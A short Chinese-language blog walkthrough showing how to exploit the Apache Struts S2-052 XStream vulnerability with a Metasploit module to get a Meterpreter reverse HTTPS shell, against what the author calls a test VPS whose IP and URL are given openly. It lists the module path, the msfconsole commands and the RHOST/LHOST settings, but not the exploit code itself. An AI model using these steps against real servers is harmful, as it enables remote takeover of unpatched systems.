Struts S2-052漏洞爆出來已經快一周了,大家可能更想知道其危害~雞肋?
這里就直接給出漏洞利用拿Meterpreter的過程,想了解更多的請參考其他文章,下面是實驗演示部分。Struts S2-052漏洞利用之Meterpreter
實驗環境
靶機:165.227.29.209 (Ubuntu 16.04 、Apache/2.4.18、Struts 2.5.12:struts2-rest-showcase)
攻擊機: 114.*.*.31(Kali2.0)
漏洞url: http://165.227.29.209:8080/struts2-rest-showcase

【注】環境是搭載在VPS上的,大家可以隨便測試。
漏洞利用EXP之MSF
大家可以把這個腳本加到Metasploit中, 再重啟Metasploit應該就能看到了,官方應該已經更新了,大家可以手動添加或者更新一下Metasploit。
可以跟鏈接中的位置一樣放在:metasploit-framework/modules/exploits/multi/http/struts2_rest_xstream.rb
root@kali:~# msfconsole
msf > use exploit/multi/http/struts2_rest_xstream

就可以使用這個腳本了。
漏洞利用之Meterpreter
需要注意的是,默認的payload是: linux/x64/meterpreter_reverse_https, 大家也可以嘗試其它的payload。
利用之前需要設置一下RHOST和LHOST(公網ip),使用默認端口即可。

本地執行命令的話,正常回顯沒有問題,遠程拿meterpreter,不知道為啥最近執行命令時不那么順利,ip地址我就不掩飾了,讓大家看着更**,這是在VPS上搭建的測試環境,過段時間就將VPS銷毀。
【注】如果圖片看不清楚,可以右鍵圖片,在新標簽頁中打開。
